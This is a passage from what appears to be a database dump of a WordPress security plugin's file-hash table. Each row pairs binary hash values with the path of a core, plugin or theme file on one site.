��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('��,=9���h�6K�','wp-includes/js/jquery/ui/draggable.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:2��g9�tL�D�','��Cu�o.t�?�xd�x�CK�6�Ηp_�','',0,'?'),('��un�Rـ���:9��','wp-content/plugins/all-in-one-wp-security-and-firewall/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\\"*��!83�+','��Ӻ:�B��ֶV�Ɍ)�Nɳ��p�','',0,'?'),('�\0Ƭ����#���(�','wp-content/themes/twentytwenty/package-lock.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>���=AG� ��\0�076','}Jz��0�$�1��Ǜb�����#,=���','',0,'?'),('��]�Ɖ ��e','wp-content/themes/twentytwentyone/assets/css/style-dark-mode-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��g�5�p�McHe{','�3ڢ�;!�ٺ��O���h��=rR�gV��/','',0,'?'),('�#O�������X^�v','wp-content/plugins/redirection/models/request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���yrV���G����','�Ⴊ�D�KvRw�2�X�IRe� aˤ�','',0,'?'),('�0���զ����','wp-content/plugins/wp-cerber/assets/flags/gw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*qWM����f2�c','d�n�;L�m%��\"NA�oZE!���J�_͆�','',0,'?'),('��>�/ᡇ_����','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l([qא��D#��','\\sٶ�hb�2.;�m`F��r^&�H-w �yV�~','',0,'?'),('�&UX\r�L4{����','wp-includes/js/utils.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t��0�`ߣ���MVi`','�js�@Vna�v�t\'ȀD��,݆���T;','',0,'?'),('��ԞX�[�`?��^','wp-includes/block-patterns/large-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`���3��\0�]j6?>','��b�`&h�2��)V�KF}Ո�m�?*f�搭','',0,'?'),('\Z֧��\\\Z�h�i','wp-includes/js/dist/blocks.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' */ĭ�b��@m�0','����˴kSh�4���!�3:�Tæ�~DM','',0,'?'),('\ZO�3F5K�;�@ �','wp-content/plugins/wordfence/modules/login-security/classes/controller/cron.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@�q\\�}����[�','�[�T�n�Ejd�(�$�:!�h�Ν\0�s�><','',0,'?'),('\Z&�cR�< FiC�','wp-content/plugins/wordfence/modules/login-security/views/options/option-text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ƥܐ�W^�[�g�','�dL�����cK~=0jE�]�����~\"�','',0,'?'),('\Z2N\'u<����QF�g��','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/gruntfile.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p.�U�QG�,+\\','۸iڜ�MNY�\"�|�p][� ��Dּ�D����','',0,'?'),('\ZN\Z�`i̳%�ج0','wp-content/plugins/wp-cerber/assets/flags/cn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A���-V�|֬S���','j�_�\r49�>�x+E�X��H��dF���K�`','',0,'?'),('\Zd�|�=>�EX\"J','wp-content/themes/regina-lite/gruntfile.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�O�;��{�1�4$s�','�|V��?�����2�s4��(<�^pQ��','',0,'?'),('\Z\Z��L�X�?T鍦','wp-content/themes/twentytwentyone/assets/images/young-woman-in-mauve.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','̦\\����l��G?','�;�}pSy���,7sa.�T��ˌO1q\'�5[��~','',0,'?'),('\Z��_eym�\Z�v��/\\','wp-content/plugins/wordfence/modules/login-security/js/admin-global.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�LgD5w\'|�IGV��5','�}њ@�PF�)M���$��j���p{e','',0,'?'),('\Z�����L6N�1�;8�','wp-content/plugins/wordfence/modules/login-security/views/page/section-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"���w^\n���k�6','�!�5�@�a�6t�o�5(D�s���\n��K�f','',0,'?'),('\Z�Χ).6Z��)�vm','wp-content/themes/healthcare/admin/customizer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7�j5��ć-/�','iH=Eb�ޥ�r�H��9��|�^�m�k�8P','',0,'?'),('\Z�/�>3ٰ��1��[�','wp-content/themes/skt-toothy/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f~�@%R��\"���f��','c�I�p���+��jc|q*b\Zf\n�6D��e\"��','',0,'?'),('\Z�;5�(��O�O�R�','wp-content/plugins/wordfence/lib/dashboard/widget_content_countries.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ǜ����lm�D!','�\'�9�\r9�\0o|��\Z������|����0K','',0,'?'),('\ZŴԭ�xvw�E\nv','wp-content/plugins/wp-cerber/assets/flags/mk.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��x���Zx��e��','Ŷv�ew��s��֝�wx�YԌ[@eQ�C�j','',0,'?'),('\Z�)�@��~�|Muհ�','wp-content/themes/advance/inc/kirki/assets/js/tooltip.js',0,',���et���ؖ��',',���et���ؖ��','|]��yX�E��G�@��w!2��Ѣ�(','',0,'?'),('\Z�`��c�\"�q]��\'O6','wp-content/plugins/wordfence/js/wfi18n.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i&XDE���p/N�','GU ��*��k�P,�:�?+}x�Hb�5���#�','',0,'?'),('\Z��{l46-��jT99','wp-content/plugins/wordfence/js/knockout-3.3.0.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_��B8lc^��','5�J�9h��ALg��@�`�uw�o��3��\0I>','',0,'?'),('\Z����)qtsCI9','wp-includes/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.���$[L�$�۫�','sF���z ��v�j���*� Q��w�0�ov','',0,'?'),('\Z�y��8R#O�y��','wp-admin/css/nav-menus-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+f~�Da�أv|�/�','%tK�r���t��M��b��n:�a����>E','',0,'?'),('\Z�ψ��Kr�|�s�$','wp-content/themes/wp-barrister/library/images/custom-post-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=��x��7��\0=zME','Y���%U�Z��.$O|c6��n:��\"5a1','',0,'?'),('\Z��\Z:\\��Rf�P�~3','wp-includes/class-wp-metadata-lazyloader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I^�P���;$�+\"�','^2��)E>X���4�:��U&�߳;���!e','',0,'?'),('\Z�UE�s(��#E�p','wp-includes/images/smilies/icon_mrgreen.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$_��u�X|I%~$','!B���I1�mV�-���|ј�X5D�8���h�','',0,'?'),('\Z���/�̓��T%�g4','wp-includes/js/jquery/ui/effect-drop.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���閴�u)�B���1�','��v��h��d���L�V�y�^n\"�ّ\0]p�','',0,'?'),('$�P�`��\0g�X�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yF\\����2���','2k�s��\\>��RI:nH�ȿDm�!zz���','',0,'?'),('-��c�<���@�VsZ�','wp-includes/js/api-request.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9����߿G7p6{�g','�d�6Q\\����f�:�����G`��j1V�','',0,'?'),('C�(�4�C���c�','wp-content/themes/wp-barrister/library/images/arrow-bullet.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ͷ�H��FY`Ȕ��','�f����`����ՠ:�7P!\"-�r/$�3�','',0,'?'),('Ryr�|���o>���>','wp-content/themes/twentytwentyone/assets/css/style-editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c*�ΌƝ�+�Wi�','�W/�����%=M]ZX�>\n>.\0x�5#^��','',0,'?'),('k����7|d����T;','wp-content/plugins/wordfence/modules/login-security/views/options/option-require-2fa.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�t�J��?&B�I�_�','D*��\nS��A�w��5e�\Z��ӔM2���','',0,'?'),('����[��+���','wp-content/themes/vision-lite/full-width.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h]9SI�O4����Sj�','��SI��KU����遖:i�/CnU','',0,'?'),('�\0��R�Џ�Ykb��','wp-content/themes/advance/inc/kirki/assets/js/controls/spacing.js',0,'�*F��xv�z����','�*F��xv�z����','N�Jc\"�-S oc(�P(�d������H~;','',0,'?'),('�y���!�\0pZ�[A','wp-includes/js/mediaelement/mediaelement-and-player.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�iz+*;)��E�','�-5(��:�oQ[̪���\\�\nm~�CP','',0,'?'),('�s��=����\0','wp-content/plugins/wordfence/modules/login-security/js/jquery-ui-timepicker-addon.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','89�\"��zz��Vv*��]','�ۆ%%l�:J�f<�bq��P���Pt˯}ߝ\"�f','',0,'?'),('��E�ȖqȊ?2�H�','wp-includes/js/dist/api-fetch.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-zLܗ�G��3�|4y','e�9����x^h�Ǔ|B�1u��2t�\'�Y�\n ','',0,'?'),('��<b���!�','wp-content/plugins/wp-cerber/assets/flags/ge.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Aw�J#ܿ�d��F','��6��o�M�X��ݕ�D���֖M�+','',0,'?'),('ֻE\n�<�B�[�,','wp-includes/class-wp-ajax-response.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o6�)�Q�\"Sσt�.H�','��[��$���g�nM!^\\���9t�t��>Z�','',0,'?'),('�0lw��II�Q�\n','wp-content/themes/wp-barrister/library/js/modernizr-2.6.2.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W�Y��Q`Tq�1[','�p�>�8ŃR\0:��S��;�G~���nH�5G:�','',0,'?'),('�m��n9�F�6�','wp-admin/css/admin-menu-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��i�0.���f��','C�X�R�\Z��)GU+LA�� �$�:�1�e�','',0,'?'),('#��Υ���<\":��2','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-radio.php',0,'�;1�4�7� >!s\0.','�;1�4�7� >!s\0.','�{p��۹�\0�YںC8h3$�~z�d����','',0,'?'),(')�M��^�ûoz�','wp-admin/images/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�ל�x>c������¢','�<\0Ѕҩ��هqU%��G��7r�\\�*��2J','',0,'?'),('4%�IH�O��ʰ�L','wp-includes/css/media-views.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w�\0�]������ �-','�{&B>�:]�\n��a��m����c�[zk!�','',0,'?'),('<B��ʱ�A51ӱ','wp-content/plugins/akismet/_inc/form.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�4�l*��&��i','�MB�1�QwoX4bx��c)@D�˥��k','',0,'?'),('C�/�;)��ّ�o','wp-admin/js/comment.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xc�T��#�Δ�(�','�Pi<l��D%�J{d�w�������5/','',0,'?'),('H��~�\n��x����|','wp-includes/js/dist/token-list.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�r�o��\Z�����#','r�����a����D����*�Q�R��4A�','',0,'?'),('T�gslF��ʞ�Ly','wp-admin/js/set-post-thumbnail.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�P�N�H�9e�@I','e}#����n�q�J�rJ��Q<d��Z�K�4','',0,'?'),('U�Q(H�����@�f&�','wp-content/themes/healthcare/images/fashionair-Responsive-WordPress-Premium-Theme.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u��>��Ba.\'_�\'','���|�Q��.���[�퓢XPvEn��ع�s�\r','',0,'?'),('Y ����S��z�X^','wp-content/plugins/wp-cerber/assets/flags/bj.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z��̂(,�ߨP}r��','�` �U�Y�ģ���Ç�/�5��T��\"5','',0,'?'),('a�@�WrQw��Z\n.�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ܑz�g<N��\n?o6f','���R����Eg�X3��JAc��!a�_��S{','',0,'?'),('r��\0���Rk}�!�','wp-content/themes/healthcare/bootstrap/css/bootstrap.css.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�r�C�(�S^���%','���K@V�\n����F���\n�d)$8]���_','',0,'?'),('z�|*6�S\\5��3','wp-content/plugins/wordfence/lib/wordfenceScanner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l2�Ǘ�yf[CZ߈G','H�mb�(���f�>MX��=�W��|��ٿx','',0,'?'),('��w.(s<��#�5*','wp-content/themes/wp-barrister/library/images/bullet.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m���R�2���d','�2�а�����^3d�o]`��]_u7Z�','',0,'?'),('�\n$z�X�`�1Bw','wp-includes/js/tinymce/plugins/charmap/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\��5^����','[�B�\Z,;��j�fe�MU�j|)�rv��>U�F','',0,'?'),('��=b�6��hs���t','wp-admin/ms-themes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:1R] l�I��!#_J','7�E��H����Pu�����Z�b��G','',0,'?'),('��\'��FE�A�vQMv','wp-content/plugins/wordfence/lib/Diff/Renderer/Abstract.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>\r��5]xVI�\'�i�','��G��݅\'�!���Y�E�3��P5ad��M��','',0,'?'),('�����>����p�\rB','wp-content/themes/twentytwentyone/assets/sass/06-components/pagination.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��d�N#vk�s��z','w;�[f�]X��Þ&�����y2,����F','',0,'?'),('�-Y�k@ߌ��S�','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/classes/class-epsilon-customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ӻ��\0��zeF���','�/$]#*�]mמX�\"�.�wN��}!���','',0,'?'),('�^�u[�p}`B��W1','wp-includes/blocks/table/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����̀)#\rS� ��','�q#�.Z!�g�l���讍T�\0�u�\'EA�?�','',0,'?'),('��º��\06�R&q','wp-content/plugins/wp-cerber/assets/flags/lc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?x2\Zˁ%��*�','��dV��d����5�w$�E�,Ư�{l','',0,'?'),('�k0B��a��`�','wp-includes/customize/class-wp-customize-nav-menu-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��,�#Y�bu3�����','�Ӻ�f����\r���o!�cY �o��\r����','',0,'?'),('����^�cm]�s~','wp-content/plugins/wp-cerber/nexus/cerber-nexus.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ced]@�>�t�Ɇ��','JSu�j�F#�e��҇p�U�a�;�S�','',0,'?'),('�\r)�51T�� ��o','wp-content/themes/twentytwentyone/inc/block-styles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t@/�ߢ�@e��R','��r�4����w�����zZ�Z�S$�','',0,'?'),('ܟ�ҿB∶����','wp-includes/js/dist/media-utils.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������ϱ݂I','����Ȗ�riP]�o���+�g֯�*?=P','',0,'?'),('�-=Q�Cw�tnL�#','wp-content/plugins/wordfence/lib/wfBrowscap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\r�e.�����b��','�Hz�n���O�#�/�t�ɚ\"���U ���A�i�','',0,'?'),('�.+�z�OO��%j8g','wp-content/themes/advance/inc/kirki/includes/class-kirki-helper.php',0,'p�m8 �R�Dj���,','p�m8 �R�Dj���,','\"�+�v1�;�<���M_G���;=tD�%i`$','',0,'?'),('�CN#��ĔB����','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-color-palette.php',0,'��\0���\Z����O','��\0���\Z����O','��K�!�l�̞�<�w�G �x6����A\0fj','',0,'?'),('\n��O�_��;]/^��','wp-includes/images/down_arrow.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���V�~�o�YnG~_u','��h�8ɧ���p�u�{�9������J���','',0,'?'),('ν�}�V�+�tB�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��꤀�x�٠�%�cl','N�8,�c����ae����Οi<5p$���','',0,'?'),('G_bc�.,]&���','wp-admin/js/image-edit.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\'�L�\n�r�)�L','o9J�B�{2[�Je\r����@q��ؘ�Դ�lD�','',0,'?'),('Kv�$T�MR����=�','wp-includes/css/dist/edit-post/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����n �VQ�H��','Y��^�Up���yx.ΕP��\0���\Z�����','',0,'?'),('-h��a��QR�J|`�','wp-content/themes/wp-barrister/content-gallery.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y��f[c��\'�','�-��$��nx�H�(4���!˖\"u=^�y���','',0,'?'),('2J0���xYr���','wp-content/themes/twentytwentyone/assets/sass/05-blocks/preformatted/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�Q[릶������','�)�t1��@�1\0��ו����KW���\0���','',0,'?'),('Kg\Z�P�F\\�,�f','wp-content/plugins/wordfence/modules/login-security/js/jquery.qrcode.min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Թ���Xp`me<','wP\0�p�zuYDS�z(W�ߥ��P�3$S����','',0,'?'),(']���(�7�^����U','wp-content/plugins/wp-cerber/assets/flags/zw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\�^�~����E,Tl','S��Y�2�r�5��S�a�J�\"��tJ�@ArC�','',0,'?'),('fMx��� �+9�U�','wp-admin/js/customize-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|���\Ze�+J~','��h��v�ԲF:�Zؿ�Bd`����Y���','',0,'?'),('��Ϧ��k���iIY','wp-content/themes/vision-lite/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M �!��T�`��[��R','F���ٶ����cf�h�3�h�7ML!��E�','',0,'?'),('�%��\\��MA����','wp-admin/images/wordpress-logo-white.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��qP�C��-SPD�','e�4�E��?�&�DsA���ʬ�;�)@�Xɒ','',0,'?'),('����J�}F��E\0�9�','wp-content/themes/index.php',0,'gD,V�=\\�bP','gD,V�=\\�bP','k�����~ ��UH\Z��x�P��Ā��<��;X�','',0,'?'),('��^%}�R 4�!uQ','wp-content/themes/vision-lite/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ��\0�\r*Y��`>��','�Η�˜�>Ҁw��H�x���X��.]�w�1','',0,'?'),('�=�}C���i��HT','wp-admin/network/profile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�3���@%�c ','�\\H�.7���7QtUw�ݰAK,�$A��!��Lz','',0,'?'),('��g+������,c�','wp-includes/block-supports/colors.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ef�1!9vC8�:(��\'','Uc�OТ��0;�[�z\'��أdP��+�j���0','',0,'?'),('��}�]y�Ĺ<1vp','wp-content/themes/wp-barrister/library/images/icon-fl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b�)��*�e�\n�n','9wA��,� >`�n�\"X5Rn��{�>�X�Ey�S','',0,'?'),('�g��I�!٭���_�','wp-includes/ms-blogs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','YYw_s簃@ DE�m','�~ۃG��,,?��0��v��f��UӧN��iK','',0,'?'),('���t�DX�m\0#�(�','wp-includes/customize/class-wp-customize-nav-menu-locations-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�D��]σ��2+fX','Ѵg�h��m�s�ꄑ��-vmQ�Ij�\Z]sQT9�m','',0,'?'),('��]/~���q��XŎE','wp-includes/js/jquery/ui/button.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k{�qz�uo�>���','8�v�J.�OA�z��A)�HJe�f�B�,��z','',0,'?'),('���L?\n�\n���x��@','wp-content/plugins/wp-cerber/assets/flags/al.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#����S�{r<�','����G�U0<>�.]fX�[I���\0����7','',0,'?'),('�=z���u�P��շ','wp-content/themes/regina-lite/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�yv��M�X~1���8','{m1�Oj�l�Q��L�~�ƅH@c?>K��[','',0,'?'),('B�@�R*G�xF4N}','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'�_�?Sş\Z]�y�','�6��[-�,9YR�r�\rY\"-��an�6$�','',0,'?'),('R�\\�&��T �|`','wp-includes/class-wp-user.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��b�Zd�� ��','���mA�QW,�?�;��w�FT\\>��','',0,'?'),('ynm�;�/�UsK ��','wp-includes/css/wp-embed-template-ie.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7{WP�L�{H���I�','\\aWq1��+��Я�o�L�Y\0�K���%<','',0,'?'),('|�&;�r�Ls5��','wp-admin/includes/comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I|��lu�D�','�� \r���B�%�F�V}[�j�7CF�A�','',0,'?'),('�@����8Q4��z��i','wp-content/themes/healthcare/template-home.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���A��^�Ehѝ��*','�F1a��92j��7?��엚Z8�Q���]��','',0,'?'),('���Ye�.�0s��','wp-admin/includes/class-wp-comments-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o�Kt�Jr�\"�-*�','7�d�i}k�4��+)�[��-L�4�uR_O�<Ѩ�','',0,'?'),('�A�o\r�ZԔ_�t','wp-content/plugins/wordfence/views/waf/waf-uninstall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��~�xT-4�ZK��3','�>|k��\\~/n8� 9��i�+vT��[s','',0,'?'),('��\'-�p�-��f�','wp-admin/css/l10n-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xmǏ|�s���A�',']��%FL�\nI�L��l���f426G��\'��','',0,'?'),('�$�\0b�XG��#�4','wp-content/themes/regina-lite/inc/customizer/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('��j�ֹJ����0Y','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�0W\"F)����8O�','�5���)&��BoK]���ػ��rm`%��h�O','',0,'?'),('�Q%rT>�!�e_zE��','wp-content/themes/twentytwentyone/inc/back-compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j��Տ,;�\"��]&�','\'�ߍ���\0�`q���ֶp�~�r�I�{��','',0,'?'),('�\"�< i�t��&�','wp-admin/css/colors/modern/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��X�̯��R�j�F�','24�ރ�ki<��u&�*��7�U�s��=~��F�','',0,'?'),('9�k�ɽ �JZ��<','wp-content/themes/twentytwenty/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4�G�I\"�+����','�����C��eĻ�3�q�9qR�0�a�J�','',0,'?'),('L��bP�-I1f�','wp-includes/theme-compat/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s��<w�!��1','q�2�յ��Ϣ>r�7Nj�� D�^��A5\r','',0,'?'),('N�d#R��+��r\0s[','wp-content/plugins/wordfence/views/reports/activity-report.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?ue�wD�:��E�','��ζ�\Z��)v���vG��,�h�/�ӈ�','',0,'?'),('t������!�\Z�%\n','wp-content/plugins/wordfence/vendor/composer/autoload_namespaces.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�,}vĨ3��G��)�','E�r4@\0�ԡ$��z�3�$l��\Z�`i�ex�l�','',0,'?'),('{�~��rb�\\B��%�','wp-content/plugins/wordfence/css/dt_table.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�gJbj�J��9�k:�','o[P�HyЊ}���iGc�~��<c�D�R:D�','',0,'?'),('}�꜄�| �/+(��b','wp-content/themes/healthcare/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�I�GØ�~','�H42�!����b�\"����ǒw1��7Oq(','',0,'?'),('~�ڄ}������ҳ\'','wp-content/themes/advance/front-page.php',0,'1YWǒ��u�GO�\n','1YWǒ��u�GO�\n','P�#c�qAR��9%S۵QL���}q<Sw�!E�','',0,'?'),('�7)x�bX�A;��','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/wp-customize-extenders/panels/regular.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a3�m���mә�;\\\Z','��P��k4�<@WF�U��p��ߖ2�5_','',0,'?'),('�L��\"�G�ʄ/\nN�','wp-admin/images/privacy.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ҟ�ݘ���ӽ�}�','qO.���x&��*p���@��l����Β/k','',0,'?'),('�{��Y�\\�z錿�}c','wp-includes/images/smilies/rolleyes.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ���O�2�Ofݣi�','fK�)�\n�d��!]\r)��\\}���זl�^��','',0,'?'),('����y��Ao�_���','wp-content/themes/regina-lite/layout/js/plugins/lazyload/lazyload.min.js.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����h\Z���Pݰ���','�S�#�K>�a�E1����X�E`�ί�\r�','',0,'?'),('���-� ��\"\"F6','wp-content/themes/twentytwenty/classes/class-twentytwenty-non-latin-languages.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^<�|%z�A�M�U<�','���ҟ�q�v@, C�1�4�-����zd,�P�','',0,'?'),('�?�\0��l����.�','wp-includes/class-wp-application-passwords.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;�Q����cW�M7A','��x���� �?��L�\Z�l�C�\"���Ǵ��','',0,'?'),('�2p)��t��I��','wp-content/plugins/wordfence/modules/login-security/classes/model/settings/db.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ���\0�\">y>=����','xVQ/}�琾:(3&���%�U��Jo��C','',0,'?'),('�����o�Rb��','wp-includes/js/dist/url.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bͻ�:�[P�XpXα','pʼn�\0oŖ���c�^f��$l�Б�zƝ','',0,'?'),(' \n.�� U�<��k','wp-content/themes/doctors/Readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W��>Zk�L���c','K��F|��� s��w07�Ws�)]��4����]','',0,'?'),(' Łq\Z��{��>�d-','wp-content/plugins/wp-cerber/assets/flags/mt.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z\n�r�CZ2���Y��','X�g�����a�-\0s!�\nZF�>X��\Z','',0,'?'),(' �es(N^���+q�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-phpunit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�MEƱ��(����(','E��a�\r�f U�DLb�V�ҪW#s�s��','',0,'?'),(' 